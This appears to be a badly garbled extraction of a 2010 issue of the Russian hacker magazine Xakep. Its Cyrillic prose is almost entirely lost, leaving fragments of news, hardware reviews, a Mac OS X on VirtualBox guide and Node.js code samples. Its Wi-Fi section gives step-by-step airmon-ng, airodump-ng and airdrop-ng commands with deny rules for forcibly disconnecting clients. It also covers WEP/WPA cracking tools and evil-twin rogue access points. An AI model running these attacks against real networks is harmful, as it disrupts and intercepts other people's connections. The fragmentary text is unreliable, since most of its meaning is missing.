
.

50

x 08 () 2010

.
210
:

08 (139) 2010

MALWARE

JAVASCRIPT
NODE.JS
. 30

/
139


WARDIVING
-

VIRUSTOTAL




. 74

INTRO

, ,
MALWARE, ()
. ,
,
,
, . :
, .

-
-
.
: ,

, .
Welcome to MALWARE!
nikitozz, . .

MegaNews

004

082

FERRUM
016

018

PopcornTV

Intel Atom

PC_ZONE
026

MacOS X + VirtualBox =

029

030

JavaScript

034

Microsoft's fail, ?

Node.js,
PHP, Perl Python

: ?

038

Easy-Hack

042

047

050

IT-

088

094

098

Linux

Linux

strace

104

108

112

Windows

115

C++

SYN/ACK
118

122

056

127

062

132

066

072

X-Tools

136

PSYCHO:

MALWARE

140

FAQ UNITED

074

VirusTotal

143

078

144

WWW2

egg hunt

AV-: !

VMware vSphere

FAQ

8.5

web-

026

MacOS X + VirtualBox =

056

050

074

VirusTotal

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>



> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

(korenfeld@gameland.ru)
>


/:

/ .: (495) 935-4034, : (495) 780-8824


>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)

> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU


: OPEN SOURCE,
,
,
, (,
)
.
Open Source Hardware (OSHW). -,
,
, . -

,


, .
?
, .
, Liquidware
(www.liquidware.com) Beagle
Embedded Starter Kit .
: OLED-

BeagleTouch 4.3 (,
480 x 272), Li-ion
BeagleJuice 2600 mAh,
3-6 , SD- 4 ,
Angstrom Linux
BeagleBoard.

, .
: Linux
Android,

, , RFID-.
RFID- Android
,
.
$400,
, , ,
iPad :).

GOOGLE
, Amazon S3 , ( Amazon
S3 ][), Google Google Storage for Developers (code.google.com/apis/storage). S3
- . : , , . S3,
, ,
. , Amazon
, , , Google . ,
. , Google , - Google Storage manager
GSUtil,
. 100
300 . , , . , , ,
$0.105, Google $0.17. ,
.

004

X 08 /139/ 10


, , , ,
. 97 , ,
, ,
$800 . -
. ,
, . ,
2002 ,
. ,
, , ,
, , 2005 , .
70 .
- , , .
. ,
,
.

37000 Facebook ,

IPHONE 4, JUST AVOID HOLDING IT IN THAT WAY


112 WWDC 2010, , ;
.
.
Gizmodo,
, iPhone. - ,
,
Apple
, WWDC
. ,
, Apple .
- , .
: 30
20 .
,
iPhone. Apple ,
, .
, ,
: , , ,
!
. iPhone
9,3 . ,
iPhone . Bluetooth,
Wi-Fi, GPS,

006

GSM UMTS. :
,
,
, ,
! , Apple,

( : Just avoid
holding it in that way). : $29. , ,
:).
.
iPhone 4 , ,
Retina. Apple
3,5-
4 ,
iPhone. ,
78 960x640. ,

! ? !

5- ,
720p (
, LED). . ,
Wi-Fi
Facetime, iPhone 4,
Skype. ,

, A4, , ,
iOS 4.0.
.

,

,
SDK Apple.





,

.
,
.
(),
8200,
,
.

. , ,
.
,

. ,
. -
, .
, ,

nmap,
.

3 2000
Yota. -
,

!
Step
Windows- ,

Wi-Fi, , Forb


:).
Parrot AR.Drone .
,
.

iPhone, Wi-Fi. ,
,

. .
,
Parrot AR.Drone,
,
.
Wi-Fi

008

,
. ,
(-

),
,
. Parrot AR.Drone
CES,

. ,
, .
.
, .
$299.99
$10001500! ,

,

ardrone.parrot.com,
.



!
Wings
2006


.
Wings
www.connection.ru,
,

!

(6.000 )
(12.000 )
(1.000.000 )


www.connection.ru.
: 5.000 ,
20
20 .

650 , 65 , ,
50
50 , .
?
www.connection.ru
,
, ,
- .
, ,

16

, 1 .
, Wings
: 5 9 ,
,
, .
www.connection.ru ,
\
.
:
,
,

, .
,
, -!

X 10 /130/ 09

-
-, (6.000
), (12.000 ),
(1.000.000
)? ,
,
!


?

Motorola: FlipOut

- .
: 67 67 x 17,
, 2.8" 320
240
QWERTY-.
:
.
,
.
FlipOut ,
, Android 2.1
:). -,

Android. ,
Motorola
Android 2.2 ?
MotoBlur,
Twitter Google. ; 600
512 . ,
Motorola ,
iPhone
Flash. , Webkit
Flash-

:). Motorola FlipOut


12 000 14 000 .
, , A-GPS,
3 .

iOS 4 65 ,

IOS 4.0 !
Apple, ,
, .
, Apple iOS 4.0, Dev-Team (blog.iphone-dev.org).
,
. ,
( ),
Apple. ,
PwnageTool,
Jailbreak
, . ,
. 4.0
redsn0w. Spirit (spiritjb.com),
iPad, . Apple , userland-. , .

010


11


YAHOO!

15 Yahoo!, ,
. .
, Yahoo! Microsoft ,
Yahoo!
Bing. Microsoft, ,
10- ,
, Google. Bing
, , . Yahoo! Bing
, , .
Microsoft ,
. Yahoo!
, .

100 . , 10%

FBI VS. TRUECRYPT




, 2008
--. , ,
,

256- AES. ,
,
. ,
(INC), .

, ,
,
, :
. 5 . .
,
. - ,
INC ,
,
, .
,

. ,
, ,
Truecrypt,
. ,
... , . ,
, - ,
.. ..?
, , .


,
. MMO-

012

. :
, ? , - :).
, 2012 50%
MMO-, 41 . ( $6 .).
1- , 18 ,
. ,
. .
-. ,
, ,
. ,
,
$1.4 (10 ).

- . ,
14% 256 , 33
.


, AOL
ICQ Digital Sky Technologies $187.5 .
DST ,
, ,
Mail.ru. : ,
,

,
. Financial Times ,

. FT ,
ICQ
.
, ICQ


. ,
? , ,
?

ICQ,
-. ,
, !

Google 20621 , 99%


40 .

GOOGLE :)
Google,
Android ,
. ,
. ,
, .
Android Market
, , ,
. ? . , ,
. Google
, , ,
, .
,
. ,
: , .
, ? ,
.
, , ,
.
, Android
: REMOVE_ASSET INSTALL_ASSET,
Google , .
Android TCP/SSL/XMPP- GTalk (-, ,
Gmail) , .


Google.
Google
. GTalkService
. Google
INSTALL_ASSET, Android APK- . , ,
REMOVE_ASSET, ,
. , , : Google
. , , - MITM- SSL- GTalkService
INSTALL_ASSET, - ?
GTalkService
? !

013


ASUS
,
iPad
. ,
, ,
,

, .
Asus
Computex
Asus ASUS

Eee Tablet,

. Eee Tablet
, , ,
TFT- 64
.
, 8-
1024 x 768,
2450
dpi, 0.1 .

10 . Eee Tablet

microSD, 2- , 3,5
(
), , , ,

Wacom.
Eee
Tablet

199-299
.

TWITTER.COM/KREMLINRUSSIA
40 ,
, .
: ! 6 !,
Twitter. ( Apple Cisco)
. :
Silicon Valley , ,
. , ,
, . . ,
. , . ,
, , .
!

128 -,

Toshiba

BIOS

014


Microstar (MSI). ,
BIOS ,
. BIOS UEFI-, MSI 2008 , Click
BIOS . UEFI (Universal Extensible Firmware Interface, ) Intel
EFI, , BIOS
, ,
. , UEFI Sandy
Bridge Intel : high-end.
2011. UEFI
, .
Seagate , UEFI ,
2 . BIOS UEFI ,
, C. ,
BIOS, . ROM ,
UEFI,
. , Express Gate Asus,
,
!

WINDOWS 8
www.windowsette.com -
Microsoft,
.
Microsoft
Windows 8.
Apple .
- :
1. . Windows
Windows Recovery, ,
- . , Reset Windows, but keep my stuff,
, ,
, . ,
App Store.
.
2. Windows. Microsoft, -, ,
. - .
, POST (, ), (, )
Logoff +
Hibernate Boot. ,
, ,


.
3. . ,
, - , .
Windows 8, , ,
-.
. .
WinFS, , ,
.
: , .

015

FERRUM



PopcornTV

HD- .
-,

,
. -,
HD-
.
, HD- ,
,
, Youtube ..
PopcornTV ,
-
.
, BBK :
BBK.
, c .

, ,
web-, .
Popcorn Linux
Syabas myiBox Browser, HTML-
() CSS JavaScript.
:
, , . ,
: Syabas Browser
, . -
, PHP, ASP .NET, Python, Ruby JSP.
:
HTML, .
PopcornTV :
HTML- - ,
, , , ,

016

. ,
live- , :
<a href="http://w01-cn01.akadostream.ru:8000/silverrain48.mp3" aod> </a><br>
<a href="http://broadcast02.station.ru/dfm" aod>DFM </a>

aod , -: aod = Audio On Demand


( ). , - -, vod pod .

, ,
: , ,
HTML-. : HTML-
web-.
Apache Tomcat JAVA-based -,
JSP-.
SDK,
.
Apache Tomcat,
Java-.
DVD, : tomcat
zip-, ,
startup.bat startup.sh *nix. Windows

JRE_HOME JAVA_HOME ,
Java.
Tomcat 8080 ( ),
-.
SDK .
,
ROOT SDK tomcat\webapps,

,
-.
XML, .
,

:
<?xml version="1.0" encoding="UTF-8" ?>
<video>
<item id="1" title=" ROP"/>
<item id="2" title=" TDL3"/>
</video>

,
: HTML-,
- , . JSTL
.

JSTL-:

ROOT. ,
http://localhost:8080,
SDK,
.
.


service.
, :
image
image-1280x720
page
page-1280x720
thumb
xml

,
, , : images
, page ,
, thumb ,
xml .
,

;
.

video.
xml xml, .
.
index.jsp, . JSP-
:
HTML .
-
Fast Template Smarty,
.

index.jsp :
<c:catch var="error">
<c:import var="xml" charEncoding="utf-8" url="http://dvd.xakep.ru/video.xml"/>
<x:parse var="video" doc="${xml}"/>
<x:set var="videos" select="$video//item"/>
</c:catch>
<c:set var="i" value="1"/>
<x:forEach select="$videos" varStatus="s">
<td>
<x:set var="id" select="string(@id)"/>
<c:set var="url" value="http://dvd.xakep.ru/videocast/${id}.mp4"/>
<x:set var="title" select="string(@title)"/>
<a href="${url}" vod>
<img src="http://dvd.xakep.ru/images/${id}.jpg" border="0">
</a>
<br />
<h2>${title}</h2>
</td>
<c:if test="${i % 4 == 0}">
</tr><tr>
</c:if>
<c:set var="i" value="${i+1}"/>
</x:forEach>

<c:catch> .
<c:import> xml
,
.
<x:parse> XML-.
<x:set> videos.
<x:forEach> XML-.
<c:if> .
: XML-,
item video,
,
. 4
</tr><tr> .
,
Tomcat,

portal.xml:
<service name="Xakep" id="xakep" desc="Hackers video"/>

,
XML- (, ),
.
JSP-,
DVD. z

017

FERRUM

, .
1515 ! ,
, -,
, -, HD-.
VDS,
. , .

,
, ,
. , , . ,
PCMark05,
. , 3DMark03 3DMark06
. (
- !)
FarCry 2. :

018

SuperPI Geekbench.
, Intel Atom.
.
,
DVD
. ,
Windows 7 .
, ,
.

Pro

3Q QOO!
TOWER ION

9400 .

: WINDOWS 7 HOME PREMIUM


: NVIDIA ION
: INTEL ATOM N230, 1.6
: 2 DDR2 ( 3 )
: HDD 320 (5400 ./)
: NVIDIA ION (GEFORCE 9400)
: 2- REALTEK ALC662
: 10/100/1000 /
: 6 USB 2.0, RJ45, DVI
: , ,

, : 170X150X20

ACER ASPIREREVO
R3600
:

12000 .

: WINDOWS VISTA HOME PREMIUM


: NVIDIA ION
: INTEL ATOM 230, 1.6
: 2 DDR2 (. 4 )
: HDD 160 (5400 ./), - 4--1 (SD/
SDHC/MMC/XD/MS/MS PRO)
: NVIDIA ION (GEFORCE 9400)
: REALTEK HIGH DEFINITION AUDIO 7.1
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G
: 6 USB 2.0, ESATA, RJ45, VGA (D-SUB), HDMI
: , ,
, ,
, : 180X180X30

3Q Qoo!.
Windows 7 Home Premium, , . ,
, NVIDIA ION
,
HD-,
. ,
, . DVI.

, ,
.
, , , ACER AspireRevo R3600.
( )
ION NVIDIA,
. , , ,
, . ( )
USB, eSATA HDMI,
. Wi-Fi . ( , )
.

HDMI . , -, , ,
. -
.

, .
D-SUB DVI ,
. .
, , .
, .


019


15000 .

13000 .

ASROCK ION
330-BD

ASUS EEEBOX
PC EB1012

:
: NVIDIA ION
: INTEL ATOM 330, 1.6
: 2 DDR2 (. 4 )
: HDD 320 (5400 ./), BD COMBO
: NVIDIA ION (GEFORCE 9400)
: REALTEK HIGH DEFINITION AUDIO 5.1
: NVIDIA NFORCE 10/100/1000 /
: 6 USB 2.0, RJ45, VGA (D-SUB), HDMI, S/PDIF
: ,
, : 19570186

, , , ,
, ,
.
Blu-Ray,
. , ,
, HDMI S/
PDIF. , ,
CD/DVD-.

, ASRock ION 330-BD ,


,
. , .
,
, . .

020

: WINDOWS 7 HOME PREMIUM


: NVIDIA ION
: INTEL ATOM 330, 1.6
: 2 DDR2 (. 4 )
: HDD 250 (5400 ./), - (SD/SDHC/
MMC/MS/MS PRO)
: NVIDIA ION (GEFORCE 9400)
: REALTEK HIGH DEFINITION AUDIO 5.1
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G/N
: 6 USB 2.0, RJ45, VGA (D-SUB), HDMI, E-SATA
: , , , ,
, ,
, : 222X178X26.9

ASUS
, ! , , . ,
, HD- ,
. Windows 7,
,
Wi-Fi IEEE 802.11n. , , !

, , -, -.
.

12000 .

11000 .

VIEWSONIC
VOT120 PC Mini

ZOTAC
MAG MAGHD-ND01-U

: WINDOWS XP HOME
: INTEL 945GSE
: INTEL ATOM N270, 1.6
: 1 DDR2
: HDD 160 (5400 ./)
: INTEL 945GSE
: 2-
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G/N
: 4 USB 2.0, RJ45, DVI, ESATA
: ,
, : 130X115X39

; .
Windows XP Home ,
,
.
, -, , ,
.
,
.

ViewSonic VOT120 PC Mini . -, ,


HD-,
. -, USB,
,
, .

:
: NVIDIA ION
: INTEL ATOM 330, 1,6
: 2 DDR2
: HDD 160 (5400 ./), - (SD/SDHC/
MMC/XD/MS/MS PRO)
: NVIDIA ION (GEFORCE 9400)
: REALTEK HIGH DEFINITION AUDIO 7.1
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G/N
: 6 USB 2.0, RJ45, VGA (D-SUB), HDMI, ESATA, S/PDIF
: , ,

, : 186X189X38


, ZOTAC MAG MAGHD-ND01-U
. :
,
VESA- . , , , , ,
, .

DVI,
,
, , . ,
, - .
, .

021


PCMARK05

SUPERPI MOD 1.5 1M


ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

92.589
107.342
92.563
92.761
92.76
92.754
0

20

40

60

80

100

ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

120

2133
2122
2760
2413
2574
2104
0

500

1000

1500

2000

2500

ViewSonic

: ASUS, Acer ASRock

FAR CRY 2

3DMARK

ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

7.69
4.8
10
8.27
8.23
4.35
0

10

12

fps

, ,
10 fps

3000

marks

1165
0

954
1588

4204

1419

4017

1411

4122

1115

3442

0 500 1000 1500 2000 2500 3000 3500 4000 4500

3DMark 06

3DMark 03

3450

marks

,
ViewSonic

GEEKBENCH 2.1
ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

953
798
1544
1359
1181
855
0

200

400

600

800

1000

1200

1400

1600

1800

marks

ASRock ION 330BD, ,

022

Blu-Ray. ASUS EeeBox PC EB1012, ,


. z


>> coding

lotus.xakep.ru

X-testing ontest
-
IBM Lotus Symphony 3.
Lotusphere 17 21 2011 !

DVD

- Lotus Symphony 3

,
Lotus Symphony Beta 3
lotus.xakep.ru. :
,
!

-
Lotus Symphony
.

.
freeware
opensource , IBM Lotus Symphony.
.
,

,
.
: 80%
20% Microsoft Office. ,
,
. IBM, 400 . , .
Lotus Symphony.



-. . ,

,
- . :

, .
IBM,
, ,
,

- Lotus Symphony.
:
?,
.

IBM ,
? ,
,
. ,
.
,
,
.
, ,


Lotus
1982:
Symphony

,
Lotus
Development Corporation




.

1983:


Lotus 1-2-3,

.


,

.

1984:
Lotus
Symphony

,
.
$695
12 360
.

,
.
, . Lotus Symphony ,

. , ,

.
.

.
.
,
( , ..) ,
.

198X:
80-


. Lotus
Development Corporation

.


.

1995:
IBM Lotus Development
Corporation $3,5
.

Lotus SmartSuite 3.1,

,
.

.

Symphony Beta 3



Lotus Symphony ,

.

.
Must have!
,
.
,
Lotus Symphony , .
Minifuzz . ,
,
,
.

(,
,
),
.
-

199X:


5
Lotus SmartSuite.

32-
Lotus SmartSuite

.
fail Lotus
Microsoft Office.

Ftp Server plug-in

Symphony FTP-,
FTP- ( HTML)
.

Lotus Symphony ChartShare

,
. ,
URL.

IBM Lotus Symphony Diff plug-in

, .

Database Connection Plug-in

,
Lotus Symphony
(, Sql Server').

Peach
Fuzzer (peachfuzzer.com).

Capture-Playback,

.
, . ,

.
AutoIt,
, Sikuli

2007:
Lotus
Symphony
,
IBM



, .
,
Microsoft Office,
!

2008:
IBM

Lotus Symphony.

Lotus Symphony 60
.


, .


,

Jython .
, ,
-.
,
,
,
,
. , .

2010:

Vienna

,

,
.


.

2011:

Symphony (Amsterdam)

2011 .

,


.

.

PC_ZONE
Step twitter.com/stepah

MACOS X +
VIRTUALBOX =

Mac OS X Mac. , ,
Mac. ,
Mac OS X PC, , .
,
.

, iPhone/iPad - .
, SDK
Mac OS . , Mac
, , , , Macbook Pro 15"
, .
Mac OS PC, -

026

, ,
. ,
. ,
Microsoft, Parallels, VMware Sun,
( !) Mac OS ! , . changelog
VirtualBox' ( )
Oracle,
, :

Mac OS X, VirtualBox
Experimental support for Mac OS X Server guests.
3.2.0 . ,
OS ?
server , ,
, Mac OS X. ,
Mac. , , Apple. VirtualBox,
, .
, VirtualBox' Mac OS X, Snow Leopard ( ).
,
, .

,
. , ,
Mac OS X Server. ,

mac , , leopard. 1024
20 (
Dynamically expanding storage). , -,
floppy-, -, , 128 . IDE-
ICH6, .

, ..

Mac OS X VT-x. Intel Virtualization Technology for


x86 Intel, Core 2 Duo/Quad i3/i5/
i7. Core 2 Duo E8500 Windows 7
.
AMD, ,
AMD-V.
Mac OS X (
10.6.3), , (
Windows!). Mac OS .dmg, ISO-
dmg2img (vu1tur.eu.org/tools): dmg2img source_file.dmg destination_file.iso.

027


XML-

.
VirtualBox.
( , !)
XML- . XP
: C:\Documents and Settings\<username>\.VirtualBox\
Machines\<name of the VM>\<name of the VM>.xml, Vista/
Windows 7 C:\Users\<username>\.VirtualBox\Machines\<name
of the VM>\<name of the VM>.xml. Linux' XML
/home. ,
ExtraDataItem. :
<ExtraDataItem name="VBoxInternal2/EfiBootArgs" value=" "/>
<ExtraDataItem name="VBoxInternal2/SmcDeviceKey" value="ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"/>

VirtualBox.
cdrome Mac OS X
. 90% , .
10% , .
- kernel-,
,
, .
( ExtraDataItem', ). ,
Empire EFI (prasys.co.cc/
tag/empire-efi). ISO- (, empireEFIv1085.iso),
.
Empire EFI
ISO' Snow
Leopard. (<F5>), <Enter>
, Mac OS X.

,
. , , ,
- . ,
(). ,
, .
, , .
. Reboot.
,
/, ,
.

028

(
<shift>),
. ,
<winkey>+<>.
MobileMe
, Mac ( , !?). ,
, , , .
, ,
Safari. Textmate,
Mac OS X, dmg- ( Mac OS X)
, . , ,
Mac', , ,
. , ,
ICH AC97, VirtualBox. ,
,
. ,
forums.virtualbox.org/viewtopic.php?f=4&t=30843,
kext'. PKG-,
. , , 1024x768. , ,
.
XML- ExtraDataItem :
<ExtraDataItem name="VBoxInternal2/EfiGopMode"
value="N"/>

N 0 4,
640x480, 800x600, 1024x768, 1280x1024, 1440x900 .
,
VirtualBox EFI. EFI
Extensible Firmware Interface, ,
.
, EFI , 1440x900
. , Guest Additions, , ,
.
SMB. .
:
.
SMB. Windows-
. :
smb://10.0.2.2. , 10.0.2.2 : ( VB ) .

MAC

Mac OS X
VirtualBox.

3D-
. flash-
. ,
. ,
, Mac': , . .z

PC_ZONE
STEP TWITTER.COM/STEPAH

Microsoft's fail, ?




. ,
.
: -
,
, , ?
, . - Microsoft.
,
,
( WinFS),

, ,
, .
,
Windows 7
,
. ,
.

(
), , , ,

. ,
Microsoft:

, . !
,
,
?
,
, ? , ,

(
, ). , msconfig
, ?
?

Autoruns Sysinternals?
: ,
. ,
userfriendly ? ?
,
Soluto (www.soluto.com). .

,
,
,
.
2 23 . ,
-

, ,
. - ,

.
,
No-brainer, Potentially reboot,
Required. .
,
.
Soluto , , .
. , ,
, WMP Sharing.

,
.

,
. , ,

, . ,
,
.
Potentially reboot
, . ,
(Required)
,
.

,
.
Soluto .
?
51 . . z

029

PC_ZONE
aleks.raiden@gmail.com

JavaScript

Node.js,
PHP, Perl Python
, PHP! Java! Perl,
. , Ruby Python!
.
, JavaScript.
. : ? ,
-!
, - , ? , .
AJAX,
, . ,
PHP , ,
. (
, )
, , ,
-.
- , (,
),
. ,
.
? CGI
( - ,
). FastCGI
,
. , , ,
.
.

JavaScript , ,
DOM-

030

-. , java
- ! :) , . ,

, -,
.
, , , :
JavaScript ?
: ,
. , JS , -. , :
.
. ,
, PHP/
Perl-, ,
.
, ,
, . -
, , ,
.
Nginx. JavaScript
, ,
, .
. callback,
.
,

Node.js - V8

,
, ,
/Ruby/Python.

, ?


PHP JavaScript,
. PHP:
$result = $db->fetchOne('SELECT user_name FROM user_accounts WHERE id = 1');
echo ' : ' . $result . ';';

SQL- , id = 1. :
,
, , $result. ,
,
,
, .
JS,
:
db.query('SELECT user_name FROM user_accounts WHERE id = 1', function(err, res){
  if (!err) sys.log(' : ' + res);
});
sys.log(' ');


JAVASCRIPT
, ,
.

,
.
JS,
.
Narwhal (narwhaljs.org) ,
JS-. ,

.
CommonJS (commonjs.org) API , API, API
.
JSGI (JavaScript Gateway Interface) - JavaScript. , Rhino jetty.


Node.js
,
SQL- -
(callback). ,
,
. , , ,
. ,
JavaScript callback',
.
.
,
( ..)
(, ,
). ,
,
.

, JavaScript
, .
?
, .
Rhino Mozilla, Java 1.7 JS,
.
JVM, , ,
Java. ,
- jetty, JS. ,
Rhino Google! . , ,
, JIT-,
Java-. , , ,
Rhino , ,
: ,
Java - ( PHP), , , . , ,
, , .
SpiderMonkey Mozilla, C.
, JS,
Netscape
Firefox, Adobe Acrobat
- Ultima Online.
, JS -

031


-
, TraceMonkey 3.6 Firefox. SpiderMonkey
, /++ . : Comet- APE, noSQL
CouchDB, Jaxer Apache mod_js.
Futhark Opera, , , Unite ( ), ,
Opera Mini. , ,
Opera .
V8 Google, Chrome
Chrome OS. ,
, JS-
,
.
,
, (, , ,
..). Node.JS.

NODE.JS

, Chrome ,
. V8cgi,
, -
CGI. Node.js
, , , (HTTP
TCP/UDP/Unix-socket) ,
.
,
. , , Plurk ( ),
comet-,
Java JBoss Netty, Node.js , , .
.
HTTP-,
:
var sys = require('sys'),
http = require('http');
http.createServer(function (req, res) {
res.writeHead(200, {'Content-Type': 'text/plain'});
res.end('Hello World\n');
}).listen(80, "127.0.0.1");
sys.puts('Server running at http://127.0.0.1:80/');

, example.js
node:

032

Node.js
Windows-
% node example.js
Server running at http://127.0.0.1:80/

.
Apache Bench , : running ab -n 1000 -c 100
http://127.0.0.1:80/. , , 100
. 3000
. !
C++ ,

JavaScript.
, ,
.
, :
, 0.0.1, .

, ,
, ( MySQL, ).
JavaScript, , ,
API .

NODE.JS

Node, ,
. , ,
. ,
(, , , ).
,
WebWorker HTML5
. ,
. ,
- , - ( ,
memcached' NoSQL-),
Comet',
, .
Node .
, ,
EventEmitter,
( , , , ).

INFO

info

, API

Node EventLoop
, ,
-
. , .
. JS,
, C,
(
). - .
(GC),
. Node.js
.

STREAMING-

,
,

.
, ,
-:
var sys = require('sys'),
    net = require('net'),
    spawn = require('child_process').spawn,
    http = require("http");
sys.puts('\nMy process PID: ' + process.pid + '\n');
// spawn "tail -f" on the log file; its stdout is a readable stream
var tail = spawn('tail', ['-f', '/var/log/nginx/access.log']);
sys.puts("Start tailing");
// echo every new chunk of the log to the console
tail.stdout.addListener("data", function (data) {
  sys.puts(data);
});
// every HTTP client is fed the same stream of new log lines
http.createServer(function (req, res) {
  res.writeHead(200, {"Content-Type": "text/plain"});
  tail.stdout.addListener("data", function (data) { res.write(data); });
}).listen(80);

spawn() tail, , ,
, ,
.
. ,
, tail
- . data (
) ,
tail, write(). ,
HTTP-. .

-,
node.js ,
. : node
tail.js error.log http://localhost:80.
,
error.log.

,
web 2.0 , , - ,
, . ,
, , .
, Perl , Python
, Ruby .
,
, 25-
Zend-framework. - ,
, ,
, -?
JavaScript , .
, ,
. ,
, Node.JS
. , , ,
,
!z

,
,
Node.
JS
Github,
- ,
,
.

HTTP://WWW
links

NodeJS:
groups.google.com/
group/nodejs

:
forum.nodejs.ru
JS:
en.wikipedia.org/
wiki/Server-side_
JavaScript


Node.JS:
www.slideshare.
net/the_undefined/
nodejs-a-quick-tour
Node.
JS:
nodejs.org/jsconf.pdf

033

PC_ZONE

: ?
: Linux ,
, , ,
. ?

, , ,
, , . ,
, ,
, .
, .
, ,
, ,
.
-, , WEP (Wired
Equivalent Privacy), , ,
, WPA/WPA2 (Wi-Fi Protected Access).
WEP , 100%
- .
WPA/WPA2, , , ,
.


.
Wi-Fi-, airodump,
-. ,
.
,
.
WEP IV,
WPA/WPA WPA Handshake.
,

034

, .
, ,
. ,
AP .
. aireplay .
, ,
(monitor mode), .
,
Wi-Fi *nix-.
Backtrack, .
UNetbootin
(unetbootin.sourceforge.net). :
,
. ,
aircrack,
WEP,
WPA/WPA2. , .
, airodump, aireplay aircrack
Aircrack-ng (aircrack-ng.org).

WI-FI CRACKER


( ,
WPA2). . airodump,

Python

.

( MAC-)
, aireplay deauth, -
( , MAC').
WPA Handshake,
aircrack,
. , .
,
, -
MAC-, .
MA macchanger, , aireplay .

?
, , , .
Aircrack-ng (bit.ly/wifi_adapter_list).
,
,
RTL8187L. USB $20.

Wi-Fi

SpoonWPA, -

,
.
1. AUTOMATIC WPA HANDSHAKE CAPTURE (code.google.com/p/svtoolz).
, Python' ,
. ,
WPA handshake',
. , ,
..
(, mon0), , MAC-
, dump- Handshake'.
2. SPOONWEP/SPOONWPA (forums.remote-exploit.org). Backtrack3 .
: .
, , SpoonWep/SpoonWpa
aircrack-ng
.
,
. , , ,
, .
3. GERIX WIFI CRACKER (forums.remote-exploit.org). , SpoonWep/SpoonWpa, Backtrack'
. , , ,
Gerix Wifi cracker. , ,
. : Configuration
(
) , ,
. , -, Start Sniffing and Logging Perform a test of
injection AP WEP WPA, . Fake AP

airbase-ng.

, ,
,

035


Airdrop-ng
, , ,
. ,
(d/Linksys|any): Company OUI,

WI-FI
Gerix Wifi cracker
Backtrack 4
. aireplay-ng, mdk3, Void11 , ,
,
AP.
, . Shmoocon Airdrop-ng.
?
. . . , .
, , .
, . ,
( ), ,
,
(,
Dell). .
.
: action/ap/client.
action (a allow)
(d deny). ap client , . :

Backtrack , , ,
. Wi-Fi,
, .
1. MegaNews Wi-Fi, .
, , Wi-Fi USB-,
, Backtrack ,
Spoonwep/Spoonwpa.
. ;
, - dealextreme.com. ,
nag.ru
lan23.ru.
2. , , WiFi Pineapple (WiFi
Pineapple).
Rogue AP. , . 4- .
$144, ,
.
Fon 2100 (www.fon.com)
Atheros, (bit.ly/onoffswitch),
KARMA Jasager
(www.digininja.org/jasager). www.hak5.org/w/index.php/
Jasager
.

a(allow)/bssid mac(or 'any')|client mac(or 'any')

d(deny)/bssid mac(or 'any')|client mac(or 'any')

Airdrop-ng ,
.
: d/00-11-22-33-44-55|any.
(any) ,
MAC- 00:11:22:33:44:55. MAC'

036


MAC- .
. ,
Wi-Fi Apple: d/any|Apple.
: client
MAC-, , 11:22:33:44:55:66,00:
11:22:33:44:55,55:44:33:22:11:0. ,
.

AIRDROP-NG

Airdrop-ng Python
airodump-ng Lorcon 1.
Backtrack,
:
apt-get update
apt-get install airdrop-ng


:
1) Wi-Fi-
:
airmon-ng start wlan0

2) airodump,
.csv-:
airodump-ng -w dumpfile --output-format csv
mon0

3) AirDrop.
, AP, mac = 00-11-22-3344-55, rules:
nano rules
d/00-11-22-33-44-55|any

4) , airdrop-ng, csv- :
airdrop-ng -i mon0 -t dumpfile.csv -r rules

,
.
"-b", .
,
. ,
,
:
#Allow-
a/00-11-22-33-44-55|55-44-33-22-11-00
#Deny-
d/00-11-22-33-44-55|any

,
MAC- 55-44-33-22-11-00,
- . , Airdrop-ng
:). !

Backtrack 4 , Wi-Fi

EVIL TWINS V2.0

, , , Airdrop-ng MITM. , AP
,

, .
Free Wi-Fi, ,
, ,
AP-, .
Evil Twins ( Rogue AP) 2004
.
,
probe-,
. ,
, ESSID
, ,
, ,
. , : ,
,
. ,
AP,
.
Airdrop-ng ,
AP, ( IP
00:aa:bb:cc:dd:ee):

WARNING

info

.
,
-,
, , -,
.
.

.

a/00:aa:bb:cc:dd:ee|any
d/any|any


Rogue AP.
KARMA 2004 . Metasploit, Karmetasploit
(bit.ly/Karmetasploit)
.
.
Airdrop-ng,
Shmoocon (www.
shmoocon.org/2010/slides/wifibomb.zip). ,
,
. .z

037


GreenDog agrrrdog@gmail.com

Easy Hack

HTTP.
, etag,
.

httprint.

: HTTP

:
][ , / , FTP-
